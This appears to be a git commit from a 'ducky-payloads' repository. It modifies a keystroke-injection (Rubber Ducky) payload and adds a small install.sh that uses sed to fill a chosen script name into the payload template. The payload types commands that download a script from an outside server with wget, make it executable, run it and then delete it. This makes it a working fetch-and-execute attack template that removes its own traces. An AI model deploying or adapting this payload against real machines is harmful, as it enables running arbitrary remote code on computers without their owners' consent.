add install.sh
This commit is contained in:
parent
8fa0fed2f4
commit
a96d397a94
|
@ -4,19 +4,19 @@ REM DESCRIPTION Fetch and execute a script from remote repository
|
||||||
REM VERSION 1.0
|
REM VERSION 1.0
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh
|
STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/script.sh
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING chmod +x hello_world.sh
|
STRING chmod +x script.sh
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING ./hello_world.sh
|
STRING ./script.sh
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING rm hello_world.sh
|
STRING rm script.sh
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
DELAY 200
|
DELAY 200
|
3
install.sh
Executable file
3
install.sh
Executable file
|
@ -0,0 +1,3 @@
|
||||||
|
#!/bin/sh
|
||||||
|
sed s/script.sh/$1/g example.dd > payload.dd
|
||||||
|
|
Loading…
Reference in a new issue